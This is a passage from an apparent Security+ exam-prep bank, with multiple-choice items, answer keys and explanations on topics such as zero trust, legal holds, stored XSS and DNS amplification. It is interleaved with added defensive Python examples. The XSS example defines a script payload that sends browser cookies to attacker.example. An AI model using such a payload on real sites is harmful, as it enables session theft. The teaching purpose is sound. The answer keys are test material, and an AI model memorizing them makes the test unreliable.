C.Remove the hard drive and image it without any documentation
D.Leave the laptop unlocked so the next analyst can inspect it quickly
AnswerB

Sealing and documented handoffs create a defensible custody record and reduce the chance of tampering.

Why this answer

Option B is correct because sealing the device in an evidence bag and recording each handoff with signatures establishes a documented, unbroken chain of custody. This ensures the integrity of the evidence by preventing tampering and providing a verifiable record of who handled the device and when, which is critical for admissibility in legal proceedings.

Exam trap

The trap here is that candidates may think a factory reset (Option A) helps investigators start clean, but it actually destroys evidence, while proper sealing and documentation (Option B) is the only method that preserves evidence integrity for legal proceedings.

How to eliminate wrong answers

Option A is wrong because factory resetting the laptop destroys all potential evidence, including files, logs, and metadata, making it impossible for investigators to recover data relevant to the theft. Option C is wrong because removing the hard drive and imaging it without documentation violates chain of custody principles, as there is no record of who performed the action or when, compromising evidence integrity. Option D is wrong because leaving the laptop unlocked risks unauthorized access, alteration, or deletion of evidence, breaking the chain of custody and potentially rendering the evidence inadmissible.

481
Multi-Selectmedium

A manufacturer wants partner-company users to access a procurement portal. The manufacturer does not want to create separate local accounts, and the partners want to authenticate their own users with existing corporate identities. Which two capabilities should be implemented? Select two.

Select 2 answers
A.Create a separate local account for every partner employee and store the passwords internally.
B.Trust the partner identity providers through federation and accept their assertions.
C.Use a shared generic partner login for each company to simplify support.
D.Map partner roles or groups to application permissions after authentication.
E.Require partners to email screenshots of their credentials to request access.
AnswersB, D

Federation lets the portal rely on partner identity systems instead of creating local passwords.

Why this answer

Option B is correct because federation allows the manufacturer to trust identity assertions from the partners' own identity providers (IdPs) using standards like SAML 2.0 or OIDC. This eliminates the need for local accounts while enabling partners to authenticate with their existing corporate identities, meeting both requirements.

Exam trap

The trap here is that candidates may treat role mapping (Option D) as the primary solution, but federation is the core capability for external authentication, while role mapping is a separate authorization step that occurs after authentication.

482
Multi-Selecthard

A development team signs branch-router firmware before deployment. The same code-signing private key is stored on two build servers, and a compromise of either server would let an attacker sign malicious updates that look legitimate. Which two changes best reduce the cryptographic risk while preserving the ability to sign trusted releases? Select two.

Select 2 answers
A.Move the signing private key into a non-exportable hardware security module or managed key service.
B.Use separate signing keys for each product line or release environment to limit blast radius.
C.Encrypt the build server disks with full-disk encryption so the private key stays protected.
D.Store the private key in a read-only artifact repository so all build agents can access it.
E.Replace the signing process with file hashes and checksums to verify release integrity.
AnswersA, B

Keeping the signing key in an HSM or managed key service prevents attackers from copying it off the server. If the build host is compromised, the attacker still cannot easily extract the private key. That preserves trusted signing while materially reducing the chance of key theft and unauthorized firmware signing.

Why this answer

Option A is correct because moving the private key into a non-exportable hardware security module (HSM) or managed key service ensures the key material never resides on the build servers in a form that can be extracted. Even if a build server is compromised, the attacker cannot steal the private key to sign malicious firmware. This directly addresses the risk of key exposure from server compromise while preserving the ability to sign trusted releases through secure API calls to the HSM.

Exam trap

CompTIA often tests the misconception that full-disk encryption (Option C) is sufficient to protect keys in use, when in reality it only protects data at rest and does nothing to prevent key extraction from a compromised running system.

483
MCQhard

A web portal for customer refunds checks device health at sign-in, then re-checks the device and user context before each refund over a threshold. A session that started on a managed laptop is blocked when the laptop later fails posture checks, even though the password remains valid. Which principle is best illustrated?

A.Defense in depth
B.Zero trust
C.Least privilege
D.Need-to-know
AnswerB

The portal does not trust the session simply because the user authenticated once. It repeatedly evaluates device posture and context before granting sensitive actions, and it can deny access when risk changes. That is the core of zero trust: verify explicitly, assume no persistent trust, and re-evaluate access continuously instead of relying on an initial login event.

Why this answer

The scenario describes a system that continuously verifies trust—checking device health at sign-in and re-evaluating both device and user context before each high-value action—and blocks access even when the password is valid. This is the core of Zero Trust: 'never trust, always verify,' where authentication and authorization are re-assessed at every transaction, not just at session start. The policy enforces access decisions based on real-time posture (e.g., device compliance, user behavior) rather than relying solely on a static credential.

Exam trap

The trap here is that candidates confuse 'Zero Trust' with 'defense in depth' because both involve multiple security layers, but Zero Trust specifically mandates continuous re-validation of trust for each access request, not just layered static controls.

How to eliminate wrong answers

Option A is wrong because defense in depth is a layered security strategy (e.g., firewall + antivirus + IDS) that does not specifically require continuous re-verification of device health within a single session; this scenario is about dynamic trust decisions, not multiple independent controls. Option C is wrong because least privilege limits user permissions to the minimum needed for their role (e.g., read-only access), but it does not address re-checking device posture or blocking a session mid-stream based on health changes. Option D is wrong because need-to-know restricts access to data based on a user's specific job requirement, not on device compliance or continuous authentication; it is about data classification, not session-level trust revocation.
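The per-transaction trust evaluation this question describes, as an added example that is not part of the original question bank. The refund threshold, the posture and location signals, and the scenario data are all constructed assumptions; the point it shows is that the decision at sign-in is not reused for a later high-value refund.

```python
from dataclasses import dataclass

REFUND_THRESHOLD = 500.00  # assumed: refunds above this get a fresh trust check


@dataclass
class DevicePosture:
    managed: bool
    compliant: bool  # e.g. disk encrypted, EDR agent healthy, patches current


@dataclass
class RequestContext:
    device: DevicePosture
    user_location: str  # coarse location of the request as seen by the portal


@dataclass
class Session:
    user: str
    device_id: str
    password_valid: bool
    sign_in_location: str


def device_trusted(posture):
    return posture.managed and posture.compliant


def sign_in(user, device_id, password_valid, context_source):
    """Initial authentication: credential plus a device health check.
    Returns a Session, or None when either check fails."""
    ctx = context_source(device_id)
    if not password_valid or not device_trusted(ctx.device):
        return None
    return Session(user, device_id, password_valid, ctx.user_location)


def authorize_refund(session, amount, context_source):
    """Per-transaction decision. Trust established at sign-in is not reused
    for high-value refunds: posture and user context are fetched again now,
    so a still-valid password is not enough on its own."""
    if not session.password_valid:
        return (False, "session credential invalid")
    if amount <= REFUND_THRESHOLD:
        return (True, "allowed: below threshold")
    ctx = context_source(session.device_id)
    reasons = []
    if not device_trusted(ctx.device):
        reasons.append("device failed posture check")
    if ctx.user_location != session.sign_in_location:
        reasons.append("user context changed")
    if reasons:
        return (False, "blocked: " + "; ".join(reasons))
    return (True, "allowed: re-verified device and user context")


def run_scenario():
    """Constructed walk-through of the question's scenario."""
    state = {"device": DevicePosture(managed=True, compliant=True),
             "location": "US-IL"}

    def context_source(device_id):  # live lookup each time, never cached
        return RequestContext(state["device"], state["location"])

    session = sign_in("refund-agent", "LAPTOP-0042", True, context_source)
    decisions = [
        authorize_refund(session, 120.00, context_source),
        authorize_refund(session, 2500.00, context_source),
    ]
    # Later in the same session the laptop drops out of compliance
    # (constructed event, e.g. its EDR agent stops reporting).
    state["device"] = DevicePosture(managed=True, compliant=False)
    decisions.append(authorize_refund(session, 2500.00, context_source))
    decisions.append(authorize_refund(session, 120.00, context_source))
    return session, decisions


if __name__ == "__main__":
    _, results = run_scenario()
    for allowed, reason in results:
        print("ALLOW" if allowed else "DENY ", reason)
```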

484
MCQ · medium

A records manager learns that emails related to a harassment investigation are scheduled for deletion next week under the retention policy. Legal issues a hold because the case may go to court. What should the records manager do?

A.Delete the emails after creating a summary report
B.Archive the emails permanently in the same mailbox
C.Suspend deletion until the legal hold is lifted
D.Anonymize the sender names and keep the messages
Answer: C

A legal hold overrides routine retention schedules, so deletion must stop until the matter is resolved.

Why this answer

A legal hold overrides standard retention policies because it preserves electronically stored information (ESI) that may be relevant to litigation. The records manager must immediately suspend deletion to avoid spoliation, which could result in legal sanctions. This aligns with the eDiscovery process and the duty to preserve evidence once litigation is reasonably anticipated.

Exam trap

CompTIA often tests the distinction between retention policies (which automate deletion based on time) and legal holds (which override those policies to preserve evidence), and the trap here is assuming that a summary report or anonymization satisfies legal preservation requirements when only a full suspension of deletion is acceptable.

How to eliminate wrong answers

Option A is wrong because deleting the emails after creating a summary report destroys the original ESI, which may be required as native evidence in court; a summary is not a substitute for the original messages. Option B is wrong because archiving emails permanently in the same mailbox does not prevent them from being overwritten or altered by normal mailbox operations, and it does not implement a proper legal hold that preserves the data in a forensically sound manner. Option D is wrong because anonymizing sender names alters the evidence, potentially destroying metadata and context needed for the investigation and violating the integrity of the ESI under legal hold requirements.

485
MCQ · medium

A security manager at a healthcare organization is responsible for maintaining the information security policy. A project manager requests a policy exception to use a cloud-based analytics platform that stores patient data. The platform currently encrypts data at rest with AES-128 instead of the required AES-256. The security manager assesses the risk and determines that the likelihood of data exposure is low due to other compensating controls already in place, but the impact would be high. The residual risk is within the organization's risk appetite. Which of the following is the most appropriate action for the security manager to take?

A.Deny the exception and require the project to use an approved platform that meets the AES-256 requirement.
B.Approve the exception and document the compensating controls and a review date.
C.Accept the risk and allow the project to proceed without a formal exception.
D.Escalate the request to the chief information officer for a final decision.
Answer: B

This is correct because a formal exception process with documented compensating controls and a scheduled review ensures that the risk is managed, tracked, and reassessed over time. This aligns with security program management best practices.

Why this answer

Option B is correct because the security manager has assessed the risk, determined that compensating controls reduce the likelihood of data exposure, and confirmed that the residual risk is within the organization's risk appetite. Formally approving the exception with documented compensating controls and a review date ensures governance, accountability, and a timeline for reassessment, which aligns with the policy exception process in security program management.

Exam trap

The trap here is that candidates may assume any deviation from policy must be denied (Option A) or escalated (Option D), failing to recognize that a formal exception process with compensating controls and a review date is the correct risk-based action when residual risk is within appetite.

How to eliminate wrong answers

Option A is wrong because it ignores the risk assessment showing low likelihood and acceptable residual risk; a blanket denial without considering compensating controls is overly rigid and not risk-based. Option C is wrong because accepting the risk without a formal exception bypasses the policy exception process, leaving the deviation undocumented and unmonitored, which violates audit and compliance requirements. Option D is wrong because the security manager has the authority to approve exceptions within the risk appetite; escalating unnecessarily delays the project and abdicates the manager's responsibility for risk decisions.

486
MCQ · medium

Based on the exhibit, what vulnerability is the application most likely suffering from?

A.Stored cross-site scripting, because attacker-controlled script is saved and later rendered to other users.
B.Command injection, because the script attempts to send cookies to a remote host.
C.Session fixation, because users saw the same review page after posting.
D.Insecure deserialization, because the payload is embedded in a review field.
Answer: A

Stored cross-site scripting is correct because the malicious script was submitted once, saved by the application, and then executed for other visitors when the review was displayed. The evidence of requests to the attacker domain confirms that the browser executed the injected script and exposed user data.

Why this answer

The application stores user-supplied input in a review field and later renders it to other users without encoding it for HTML output. The exhibit shows a script tag attempting to exfiltrate cookies to a remote host, which is a classic stored cross-site scripting (XSS) payload. Because the malicious script is persisted on the server and executed in the browsers of every subsequent visitor, the vulnerability is stored XSS.

Exam trap

CompTIA often tests the distinction between stored XSS and reflected XSS, where candidates may confuse the persistence of the payload (stored) with the immediate reflection of input (reflected), or they may incorrectly associate cookie exfiltration with command injection rather than client-side scripting.

How to eliminate wrong answers

Option B is wrong because command injection involves injecting operating system commands into a server-side process (e.g., via shell metacharacters like `;` or `|`), not sending cookies via JavaScript; the script's behavior of exfiltrating cookies is a client-side action, not server-side command execution. Option C is wrong because session fixation requires an attacker to force a known session ID on a user before login, and the scenario describes a review page being displayed after posting, which is unrelated to session ID manipulation. Option D is wrong because insecure deserialization exploits the deserialization of untrusted data objects (e.g., PHP or Java serialized objects) to execute arbitrary code, whereas the payload here is a simple script tag embedded in a text field, not a serialized object.
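A compact illustration of the stored XSS pattern described above, added here as an example; it is not code from the page or from any application it refers to. The in-memory review store, the attacker host attacker.example and the cookie-stealing payload are constructed for the example. The vulnerable renderer concatenates the saved review straight into HTML, while the hardened renderer entity-encodes every untrusted value for the HTML body context:

```python
"""Stored XSS: a review saved verbatim and later rendered for every visitor.

Added illustration for the review-page scenario; not code from the original
page. The review store, attacker domain and payload are constructed.
"""
import html
import re

# Constructed attacker payload of the kind the exhibit describes: a script that
# ships document.cookie to a host the attacker controls (hypothetical domain).
PAYLOAD = (
    "<script>new Image().src='https://attacker.example/c?'+document.cookie"
    "</script>"
)

REVIEWS = []  # in-memory stand-in for the application's database


def store_review(author: str, text: str) -> None:
    """Persist the review as submitted. Storing raw text is fine on its own;
    the defect is in how the text is rendered later."""
    REVIEWS.append({"author": author, "text": text})


def render_reviews_vulnerable(reviews) -> str:
    """Vulnerable rendering: untrusted text is concatenated straight into HTML,
    so a stored <script> runs in every visitor's browser."""
    items = "".join(
        f"<li><b>{r['author']}</b>: {r['text']}</li>" for r in reviews
    )
    return f"<ul>{items}</ul>"


def render_reviews_hardened(reviews) -> str:
    """Fixed rendering: every untrusted value is HTML-entity encoded for the
    context it lands in (element body), so the payload becomes inert text."""
    items = "".join(
        f"<li><b>{html.escape(r['author'])}</b>: "
        f"{html.escape(r['text'])}</li>"
        for r in reviews
    )
    return f"<ul>{items}</ul>"


_SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def contains_live_script(page: str) -> bool:
    """Crude check used only to show the difference: does the final HTML still
    contain an unencoded <script> start tag?"""
    return bool(_SCRIPT_TAG.search(page))


def demo():
    """Attacker posts once; every later visitor receives the stored page."""
    REVIEWS.clear()
    store_review("mallory", PAYLOAD)
    store_review("alice", "Great product <3")  # ordinary review with a '<'
    vuln = render_reviews_vulnerable(REVIEWS)
    safe = render_reviews_hardened(REVIEWS)
    return contains_live_script(vuln), contains_live_script(safe)


if __name__ == "__main__":
    print(demo())
```

Encoding is context-specific: html.escape is the right tool for element content and attribute values, but text placed inside a script block, a URL or a CSS value needs that context's encoder. Marking the session cookie HttpOnly keeps document.cookie empty for this payload, and a Content-Security-Policy that forbids inline script blocks it outright; both reduce the impact but do not replace output encoding at the point of rendering.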

487
MCQ · easy

A company is considering a new SaaS vendor that will process customer records. What is the best first action before signing the contract?

A.Perform vendor due diligence and review the vendor's security controls
B.Allow the vendor access immediately and monitor for misuse afterward
C.Ask the vendor to send a marketing brochure and pricing sheet only
D.Wait until a security incident occurs before reviewing the vendor
Answer: A

Before onboarding a vendor that will handle sensitive records, the organization should evaluate the vendor's security posture, contractual terms, and control maturity.

Why this answer

Performing vendor due diligence and reviewing the vendor's security controls is the best first action because it proactively assesses the SaaS vendor's ability to protect customer records before any data is shared. This aligns with the principle of 'trust but verify' and ensures that the vendor's security posture meets the company's compliance requirements (e.g., GDPR, HIPAA) and risk tolerance before signing a legally binding contract.

Exam trap

The trap here is that candidates may think 'allowing access immediately and monitoring' is acceptable due to a false sense of security from logging tools, but CompTIA tests that proactive due diligence is mandatory before any data sharing, as monitoring alone cannot prevent contractual or compliance violations.

How to eliminate wrong answers

Option B is wrong because allowing immediate access without a prior security review exposes customer records before any contractual or technical safeguard exists; monitoring can detect misuse after the fact but cannot prevent a breach or unauthorized use. Option C is wrong because a marketing brochure and pricing sheet provide no technical or operational details about the vendor's security controls, encryption standards, or incident response capabilities, making it impossible to assess risk. Option D is wrong because waiting for a security incident before reviewing the vendor is a reactive, high-risk approach that could lead to regulatory fines, reputational damage, and legal liability for compromised customer data.

488
Multi-Select · easy

A security team receives a suspicious email attachment and wants to inspect its behavior safely before any user opens it. They also want a tool that can isolate the same threat if it reaches an endpoint. Which two tools or capabilities best fit this need? Select two.

Select 2 answers
A.EDR remote isolation capability on the endpoint.
B.Sandboxing the attachment before release to users.
C.DLP monitoring to prevent accidental data leakage.
D.A WAF filtering web requests to the application.
E.Port mirroring on a switch for traffic review.
Answers: A, B

EDR can isolate the host while preserving its state for later investigation.

Why this answer

A is correct because EDR remote isolation capability allows the security team to immediately disconnect an endpoint from the network if the suspicious attachment is executed, preventing lateral movement and data exfiltration. B is correct because sandboxing the attachment before release to users provides a safe, isolated environment to analyze the file's behavior without risking the production network. Together, these tools address both proactive analysis (sandbox) and reactive containment (EDR isolation).

Exam trap

The trap here is that candidates may confuse DLP's data loss prevention role with threat analysis or endpoint containment, overlooking that DLP does not execute files or isolate systems.

489
Multi-Select · medium

The legal team wants to confirm that customer records are being deleted on schedule after the retention period expires. Which two artifacts best demonstrate compliance? Select two.

Select 2 answers
A.An approved retention schedule or retention policy that defines the deletion period.
B.A folder of employee social media posts about data cleanup.
C.System or audit logs showing the deletion job ran successfully.
D.A list of all printers in the office environment.
E.A draft policy from last year that was never approved.
Answers: A, C

A retention schedule establishes the rule the organization is supposed to follow. Without it, there is no clear basis for deciding when records should be deleted.

Why this answer

Option A is correct because an approved retention schedule or policy is the authoritative document that defines the required deletion period for customer records. It serves as the legal mandate against which compliance is measured. Option C is correct because system or audit logs provide verifiable evidence that the deletion job executed successfully, confirming that the policy was actually followed.

Together, these two artifacts demonstrate both the requirement (policy) and the execution (logs) needed to prove compliance.

Exam trap

The trap here is that candidates may confuse a draft or unapproved policy (Option E) with an approved one, or mistakenly think that informal evidence like social media posts (Option B) can substitute for authoritative documentation and verifiable logs.

490
Multi-Select · hard

After a phishing simulation, many employees still almost entered credentials into a fake login page. Leadership wants the fastest improvement without creating training fatigue or disrupting daily work. Which three measures are the best balance of security and usability? Select three.

Select 3 answers
A.Provide targeted microtraining only to users who clicked or nearly clicked.
B.Add a one-click report-phish button and acknowledge employee reports quickly.
C.Use just-in-time warning banners or link-check prompts when users follow external login pages.
D.Replace email access with a weekly manual approval queue for all messages.
E.Publicly identify the worst performers in team meetings to discourage mistakes.
Answers: A, B, C

Targeted coaching addresses the observed behavior without forcing unnecessary training on the entire workforce.

Why this answer

Option A is correct because targeted microtraining focuses only on the users who demonstrated risky behavior (clicking or nearly clicking), which addresses the observed behavior without forcing training on users who did not engage; keeping the content brief and relevant avoids training fatigue and leaves the rest of the workforce undisturbed. Option B is correct because a one-click report button lowers the effort of doing the right thing and gives the security team earlier visibility into real phishing, and acknowledging reports quickly reinforces the behavior. Option C is correct because just-in-time warnings or link checks intervene at the moment a user is about to enter credentials on an external login page, which is exactly where the simulation showed the near-misses, without adding friction to ordinary work.

Exam trap

The trap here is that candidates may confuse 'fastest improvement' with 'most aggressive technical control' (like option D) or 'public shaming' (like option E), failing to recognize that behavioral change through targeted, low-friction interventions (microtraining, reporting, and just-in-time prompts) yields faster and more sustainable results without alienating users.

491
MCQ · medium

A public website is overwhelmed by a flood of DNS responses arriving from many open resolvers after the attacker sends small forged queries to those resolvers. The target bandwidth is saturated and the source IPs vary widely. What kind of attack is being used?

A.SYN flood
B.DNS amplification DDoS
C.Replay attack
D.Man-in-the-middle attack
Answer: B

DNS amplification uses small spoofed requests to trigger much larger replies from reflectors, multiplying traffic toward the victim.

Why this answer

B is correct because this scenario describes a DNS amplification DDoS attack. The attacker sends small forged DNS queries with a spoofed source IP (the victim's IP) to open resolvers, which respond with much larger DNS replies. The flood of amplified responses saturates the victim's bandwidth, and the varying source IPs make mitigation difficult.

This matches the description of a reflection/amplification attack using DNS.

Exam trap

The trap here is confusing a DNS amplification attack with a SYN flood because both involve flooding, but the key differentiator is the use of DNS responses from open resolvers versus incomplete TCP handshakes.

How to eliminate wrong answers

Option A is wrong because a SYN flood targets the TCP three-way handshake by sending many SYN packets without completing the handshake, exhausting server resources; it does not involve DNS responses or open resolvers. Option C is wrong because a replay attack involves capturing and retransmitting valid data transmissions (e.g., authentication tokens) to trick a system; it does not use DNS queries or bandwidth saturation. Option D is wrong because a man-in-the-middle attack intercepts or alters traffic between two parties who believe they are communicating directly; it is an attack on confidentiality and integrity, not a volumetric flood that exhausts bandwidth.
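The key signature of a reflection flood is answers arriving from resolvers the victim never queried. The detection logic below is an added example, not code from the page or from any product; the flow records are constructed, and the addresses come from the RFC 5737 documentation ranges. It compares inbound bytes from UDP/53 sources against what the host itself sent to port 53, and flags a host that receives large unsolicited answers from many distinct resolvers:

```python
"""Spotting a DNS reflection/amplification flood in flow records.

Added example for the DNS amplification scenario; not code from the page.
Flow records are constructed; addresses are RFC 5737 documentation ranges.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    src: str
    sport: int
    dst: str
    dport: int
    nbytes: int


def constructed_flows():
    """Constructed sample: one legitimate lookup, then a flood of unsolicited
    answers from 40 open resolvers aimed at the victim 203.0.113.10."""
    flows = [
        # Ordinary lookup: the victim asks its own resolver, ~60-byte query,
        # modest answer back.
        Flow("203.0.113.10", 51000, "198.51.100.1", 53, 60),
        Flow("198.51.100.1", 53, "203.0.113.10", 51000, 180),
    ]
    # The flood: large answers from resolvers the victim never queried. The
    # attacker's forged queries were sent from elsewhere with the victim's
    # address as source, so no matching outbound query appears here.
    for i in range(1, 41):
        flows.append(Flow(f"192.0.2.{i}", 53, "203.0.113.10", 40000 + i, 3000))
    return flows


def amplification_report(flows, min_resolvers=20, min_ratio=10.0):
    """Per destination host, compare answers arriving from UDP/53 sources
    against queries the host itself sent to UDP/53. Unsolicited answers from
    many distinct resolvers with a high in/out byte ratio mark a reflection
    flood. Returns {victim_ip: (distinct_resolvers, unsolicited_bytes, ratio)}.
    """
    queried = defaultdict(set)    # host -> resolvers it actually asked
    out_bytes = defaultdict(int)  # host -> bytes it sent to port 53
    inbound = defaultdict(list)   # host -> answers it received from port 53
    for f in flows:
        if f.dport == 53:
            queried[f.src].add(f.dst)
            out_bytes[f.src] += f.nbytes
        elif f.sport == 53:
            inbound[f.dst].append(f)

    report = {}
    for host, answers in inbound.items():
        unsolicited = [a for a in answers if a.src not in queried[host]]
        resolvers = {a.src for a in unsolicited}
        in_bytes = sum(a.nbytes for a in unsolicited)
        ratio = in_bytes / max(out_bytes[host], 1)
        if len(resolvers) >= min_resolvers and ratio >= min_ratio:
            report[host] = (len(resolvers), in_bytes, round(ratio, 1))
    return report


if __name__ == "__main__":
    print(amplification_report(constructed_flows()))
```

Because the resolvers are real, well-behaved servers, blocking their addresses one by one is futile; the practical responses are upstream rate limiting or scrubbing of inbound UDP/53 toward the victim, and, on the networks the attacker abuses, source-address validation (BCP 38) so forged queries never leave them.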

492
MCQ · medium

A company wants all corporate laptops to authenticate to Wi-Fi using device certificates instead of shared passwords. It also wants to deny network access to systems that do not meet the baseline requirement for disk encryption and current endpoint protection. Which approach best satisfies both goals?

A.Use a single WPA2-Personal passphrase and email it to all employees.
B.Deploy 802.1X with certificate-based authentication and network access control posture checks.
C.Allow any device to join and rely on antivirus scans after users log in.
D.Use MAC address filtering and a captive portal for all internal Wi-Fi users.
Answer: B

802.1X with certificates verifies device identity, and NAC posture assessment can block noncompliant endpoints.

Why this answer

802.1X with certificate-based authentication ensures that only devices with valid certificates can authenticate to the Wi-Fi network, eliminating reliance on shared passwords. Network access control (NAC) posture checks then evaluate each device against baseline requirements (e.g., disk encryption, current endpoint protection) and deny access to non-compliant systems. This combination directly satisfies both goals of certificate-only authentication and conditional access based on security posture.

Exam trap

The trap here is that candidates stop at 802.1X certificate authentication and overlook the NAC posture-check component. A valid certificate proves which device is connecting, not whether it is encrypted or protected; the question explicitly requires denying access to non-compliant systems, which only a posture assessment can enforce.

How to eliminate wrong answers

Option A is wrong because WPA2-Personal uses a single shared passphrase, which does not enforce device-specific authentication or posture checks, and emailing the passphrase to all employees introduces a security risk. Option C is wrong because allowing any device to join and relying on post-login antivirus scans does not prevent non-compliant devices from accessing the network initially, violating the requirement to deny access to systems that do not meet baseline requirements. Option D is wrong because MAC address filtering can be spoofed and does not verify device certificates or security posture, and a captive portal typically only controls web access after connection, not the initial network authentication or compliance checks.
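The following policy-as-code sketch is an added example, not code from the page or from any NAC product: it shows the two-stage decision this question expects (certificate identity first, then posture against a baseline) and, for the zero trust explanation in question 483 above, the same posture check repeated at the moment a sensitive action is requested rather than only at login. The Posture fields, the three-day signature-age limit and the list of sensitive actions are assumptions for the example.

```python
"""NAC admission plus continuous re-evaluation of device posture.

Added example; not code from the page or from any NAC or zero-trust product.
Posture attributes, the signature-age limit and the action names are assumed.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import List


@dataclass
class Posture:
    cert_valid: bool          # device certificate chains to the corporate CA and is unexpired
    disk_encrypted: bool      # full-disk encryption reported on
    edr_running: bool         # endpoint protection agent alive
    edr_signatures_at: datetime  # last signature/content update (UTC)


MAX_SIGNATURE_AGE = timedelta(days=3)   # assumed baseline value
SENSITIVE_ACTIONS = {"approve_payment", "export_records"}  # assumed


def posture_failures(p: Posture, now: datetime) -> List[str]:
    """Compare reported posture with the baseline; return every failed check."""
    failures = []
    if not p.disk_encrypted:
        failures.append("disk not encrypted")
    if not p.edr_running:
        failures.append("endpoint protection not running")
    elif now - p.edr_signatures_at > MAX_SIGNATURE_AGE:
        failures.append("endpoint protection signatures stale")
    return failures


def admission_decision(p: Posture, now: datetime) -> str:
    """802.1X/NAC at connection time: identity first (certificate), then
    posture. Non-compliant devices are quarantined (e.g. a remediation VLAN)
    rather than placed on the corporate network."""
    if not p.cert_valid:
        return "deny"
    return "allow" if not posture_failures(p, now) else "quarantine"


def authorize_action(action: str, p: Posture, now: datetime) -> str:
    """Zero-trust style check: a session admitted earlier does not get a
    sensitive action for free; posture is evaluated again at request time,
    so an agent that stopped mid-session blocks the action."""
    if action in SENSITIVE_ACTIONS:
        failures = posture_failures(p, now)
        if failures:
            return "deny: " + "; ".join(failures)
    return "allow"


if __name__ == "__main__":
    now = datetime(2024, 5, 1, 12, 0, tzinfo=timezone.utc)
    laptop = Posture(True, True, True, now - timedelta(days=1))
    print(admission_decision(laptop, now))
    laptop.edr_running = False            # agent killed after admission
    print(authorize_action("approve_payment", laptop, now))
```

In a real deployment the posture values come from the NAC agent or MDM inventory and the certificate check is done by the RADIUS server during EAP-TLS; the point of the example is the ordering and the re-check, not the data source.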

493
MCQ · easy

Based on the exhibit, what should the security team recommend before sharing the report?

A.Share the report exactly as requested, because the vendor signed a nondisclosure agreement.
B.Remove unnecessary personal fields and share only the minimum data needed for the analysis.
C.Keep all fields and encrypt the file before sending it to the vendor.
D.Store the report in a shared folder so the vendor can access it later if needed.
Answer: B

This is the correct privacy-by-design response because the vendor only needs department-level trends. The organization should minimize the data shared, especially sensitive or unnecessary fields like home addresses and medical leave codes. Limiting the dataset reduces privacy risk, supports compliance, and follows the principle of collecting and disclosing only what is needed for the stated business purpose.

Why this answer

Option B is correct because the principle of data minimization requires that only the minimum necessary data be shared to fulfill the analysis purpose. Removing unnecessary personal fields reduces the risk of exposing PII and aligns with privacy regulations such as GDPR and HIPAA, even when a nondisclosure agreement (NDA) is in place.

Exam trap

CompTIA often tests the misconception that a signed NDA or encryption alone is sufficient to share sensitive data, when in fact data minimization and least privilege are the primary security controls required.

How to eliminate wrong answers

Option A is wrong because an NDA does not justify sharing all data fields; it only provides a legal framework for confidentiality, not a technical safeguard against data exposure or misuse. Option C is wrong because encrypting the file protects it in transit and at rest but does not address the core issue: the unnecessary personal fields are still disclosed to the vendor once the file is decrypted, so encryption alone does not satisfy data minimization. Option D is wrong because storing the report in a shared folder introduces additional access control risks and does not limit the data shared to only what is needed for analysis, violating the principle of least privilege.
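Data minimization is easiest to get right as an allow-list: name the fields the purpose needs and drop everything else. The script below is an added example, not code from the page; the HR records are constructed to resemble the report the question describes (home addresses and medical leave codes present, department-level trends wanted). It goes one step beyond the question by also suppressing departments too small to hide an individual, which is a common extra precaution when aggregates are shared:

```python
"""Data minimization for a vendor export: allow-list fields, aggregate to
department level, suppress small groups.

Added example; not code from the page. Records are constructed.
"""
from collections import defaultdict
from statistics import fmean

# Constructed HR export with the kinds of fields the question mentions.
RECORDS = [
    {"employee_id": "E1001", "name": "Ana Ruiz", "department": "Claims",
     "home_address": "12 Elm St", "medical_leave_code": "", "absence_days": 2},
    {"employee_id": "E1002", "name": "Ben Okafor", "department": "Claims",
     "home_address": "9 Oak Ave", "medical_leave_code": "ML-07", "absence_days": 6},
    {"employee_id": "E1003", "name": "Cara Lind", "department": "Claims",
     "home_address": "3 Pine Rd", "medical_leave_code": "", "absence_days": 1},
    {"employee_id": "E1004", "name": "Dev Shah", "department": "Claims",
     "home_address": "77 Lake Dr", "medical_leave_code": "", "absence_days": 3},
    {"employee_id": "E1005", "name": "Eli Brandt", "department": "Finance",
     "home_address": "5 Hill Ct", "medical_leave_code": "ML-02", "absence_days": 8},
    {"employee_id": "E1006", "name": "Fay Moreau", "department": "Finance",
     "home_address": "21 Bay St", "medical_leave_code": "", "absence_days": 0},
]

# What the vendor's trend analysis actually needs. Anything not listed here is
# never copied, so a new sensitive column added upstream is dropped by default.
PURPOSE_FIELDS = ("department", "absence_days")


def minimize(records, allowed=PURPOSE_FIELDS):
    """Keep only allow-listed fields (allow-list, not a block-list of PII)."""
    return [{k: r[k] for k in allowed if k in r} for r in records]


def disallowed_fields_present(rows, allowed=PURPOSE_FIELDS):
    """Pre-release check: which fields outside the allow-list are still there?"""
    return {k for row in rows for k in row if k not in allowed}


def department_trends(records, min_group=3):
    """Aggregate minimized rows per department. Departments with fewer than
    min_group people get no average, because a department of one or two would
    reveal an individual's absence figure."""
    by_dept = defaultdict(list)
    for r in minimize(records):
        by_dept[r["department"]].append(r["absence_days"])
    trends = {}
    for dept, days in by_dept.items():
        suppressed = len(days) < min_group
        trends[dept] = {
            "headcount": len(days),
            "avg_absence_days": None if suppressed else round(fmean(days), 1),
            "suppressed": suppressed,
        }
    return trends


if __name__ == "__main__":
    print(disallowed_fields_present(RECORDS))
    print(department_trends(RECORDS))
```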

494
MCQ · medium

An online ticketing system must survive a single server failure and continue operating after a primary site outage. The business wants the lowest-cost design that still improves availability. Which architecture is best?

A.Deploy active-active servers across multiple regions with load balancing.
B.Use an active-passive design with replicated data and automatic failover to a secondary site.
C.Schedule nightly backups and restore only after the outage is confirmed.
D.Add RAID to the server to protect against all availability failures.
Answer: B

Active-passive redundancy balances cost and resilience by keeping a standby environment ready for server or site failure.

Why this answer

An active-passive design with replicated data and automatic failover (Option B) meets the requirement of surviving a single server failure and a primary site outage while minimizing cost. Unlike active-active, it uses standby resources that only activate during failover, reducing operational expense. This architecture improves availability without the complexity and cost of multi-region active-active deployment.

Exam trap

The trap here is that candidates often choose active-active (Option A) because it offers the highest availability, but they overlook the explicit 'lowest-cost' constraint, which makes the cheaper active-passive design the correct answer despite its slightly longer failover time.

How to eliminate wrong answers

